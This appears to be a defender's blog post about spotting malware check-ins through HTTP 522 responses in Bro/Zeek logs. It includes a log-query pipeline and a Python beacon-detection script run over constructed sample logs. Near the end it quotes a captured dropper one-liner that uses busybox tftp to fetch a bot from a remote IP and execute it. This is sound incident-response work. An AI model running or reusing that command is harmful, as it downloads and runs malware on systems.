522 Error Code for the Win
Recently I ran across a tweet from Packet Watcher @jinq102030 (https://twitter.com/jinq102030/status/756476442590842880) suggesting that you keep an eye on HTTP status code 522 for possible malware check-ins. 522 is not a standard HTTP code; it is what Cloudflare's edge returns when it cannot reach the origin server behind it (the 104.27.x.x addresses below are Cloudflare edge addresses). A 522 can mean several benign things, but from an IR point of view the interesting case is a malicious host fronted by Cloudflare that has been pulled offline while an infected client keeps trying to check in. So I got our intern to check the Bro logs and see what he could find.
>zcat http* | bro-cut ts id.orig_h id.resp_h host status_code | awk '$5 == "522"'
1467159441.247406 192.128.1.216 104.27.182.19 - 522
1467160356.407366 192.128.1.216 104.27.183.19 - 522
1467161271.647320 192.128.1.216 104.27.183.19 - 522
1467163102.087490 192.128.1.216 104.27.183.19 - 522
1467164017.337316 192.128.1.216 104.27.183.19 - 522
1467164932.547084 192.128.1.216 104.27.182.19 - 522
….
1467182323.201685 192.128.1.216 104.27.182.19 - 522
1467183238.447046 192.128.1.216 104.27.183.19 - 522
1467184153.641505 192.128.1.216 104.27.183.19 - 522
1467185068.903194 192.128.1.216 104.27.182.19 - 522
…
There was other traffic that turned out to be false positives, but you could easily tell that this IP was checking this site on a regular basis: the hits above are roughly 915 seconds (about 15 minutes) apart, which is what a scheduled check-in looks like, and the alternation between 104.27.182.19 and 104.27.183.19 is just the client landing on different edge addresses for the same site. Out of 4GB of compressed Bro logs for the day we only had about 200 lines that matched, so the noise ratio was very low.
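As an added example (not from the original diary or from the intern's work), the following Python reproduces the 522 hunt over a constructed Zeek/Bro http.log excerpt and goes one step further than the bro-cut pipeline: it groups the hits by internal source and flags sources whose inter-arrival times are regular, which is the pattern visible in the output above. The log lines, the beacon thresholds (at least four hits, 5% jitter) and the function names are assumptions made for the demo.

```python
"""Hunt for HTTP 522 responses in a Zeek/Bro http.log and flag sources that
hit the same site at a regular interval (beacon-like check-ins).

Added example, not part of the original diary. The log excerpt below is
constructed; only the 522 filter and the field names mirror the bro-cut
pipeline in the post.
"""

from collections import defaultdict
from statistics import median

# Constructed Zeek http.log excerpt (tab-separated, with the #fields header
# that bro-cut would normally consume). Real logs carry more columns; the
# parser keys on the #fields line, so extra columns are harmless.
SAMPLE_HTTP_LOG = """\
#separator \\x09
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\thost\tstatus_code
1467159441.247406\tC1\t192.128.1.216\t49152\t104.27.182.19\t80\t-\t522
1467159500.000000\tC2\t192.128.1.50\t49153\t104.27.1.1\t80\texample.com\t200
1467160356.407366\tC3\t192.128.1.216\t49154\t104.27.183.19\t80\t-\t522
1467161271.647320\tC4\t192.128.1.216\t49155\t104.27.183.19\t80\t-\t522
1467161300.000000\tC5\t192.128.1.77\t49156\t104.27.9.9\t80\tcdn.example\t522
1467162186.900000\tC6\t192.128.1.216\t49157\t104.27.182.19\t80\t-\t522
1467163102.087490\tC7\t192.128.1.216\t49158\t104.27.183.19\t80\t-\t522
"""


def parse_zeek_log(text):
    """Yield one dict per record, naming columns from the #fields header."""
    fields = None
    for line in text.splitlines():
        if not line:
            continue
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
            continue
        if line.startswith("#"):          # #separator, #open, #close, ...
            continue
        if fields is None:
            raise ValueError("record before #fields header")
        yield dict(zip(fields, line.split("\t")))


def find_522(records):
    """Equivalent of the bro-cut ... | awk '$5 == "522"' pipeline."""
    return [r for r in records if r["status_code"] == "522"]


def beacon_candidates(hits, min_hits=4, max_jitter=0.05):
    """Group 522 hits by internal source and flag regular inter-arrival times.

    The destination is deliberately left out of the key: in the diary the
    same client alternated between two CDN edge addresses, so grouping by
    (src, dst) would split one beacon into two half-strength series.
    Thresholds (min_hits, max_jitter) are arbitrary demo values.
    """
    by_src = defaultdict(list)
    for r in hits:
        by_src[r["id.orig_h"]].append((float(r["ts"]), r["id.resp_h"]))

    out = {}
    for src, events in by_src.items():
        if len(events) < min_hits:
            continue
        events.sort()
        gaps = [b[0] - a[0] for a, b in zip(events, events[1:])]
        med = median(gaps)
        if med <= 0:
            continue
        # Every gap within max_jitter of the median => looks scheduled.
        if all(abs(g - med) / med <= max_jitter for g in gaps):
            out[src] = {
                "interval": round(med, 1),
                "count": len(events),
                "destinations": sorted({d for _, d in events}),
            }
    return out


def hunt(text):
    """Full pipeline: parse -> filter 522 -> flag periodic sources."""
    return beacon_candidates(find_522(parse_zeek_log(text)))


if __name__ == "__main__":
    for src, info in hunt(SAMPLE_HTTP_LOG).items():
        print(f"{src}: {info['count']} x 522 every ~{info['interval']}s "
              f"to {info['destinations']}")
```

Run against a real day of logs by feeding it the decompressed http.log text instead of SAMPLE_HTTP_LOG; a single 522 from a CDN hiccup (192.128.1.77 in the sample) never reaches the threshold, while the 15-minute series stands out on its own.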
When looking at the full packet capture of the system in question, we were able to tell that it was compromised and had downloaded a bot. The command that pulled it down was:
cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh
This is the usual embedded-Linux dropper one-liner: change into whichever directory is writable, fetch the payload (a file named "min") over TFTP with busybox, copy /bin/sh locally, overwrite the copy with the payload, make it executable and run it.
This is certainly something we are going to keep looking at for finding more compromised systems.
--
Tom Webb
@twsecblog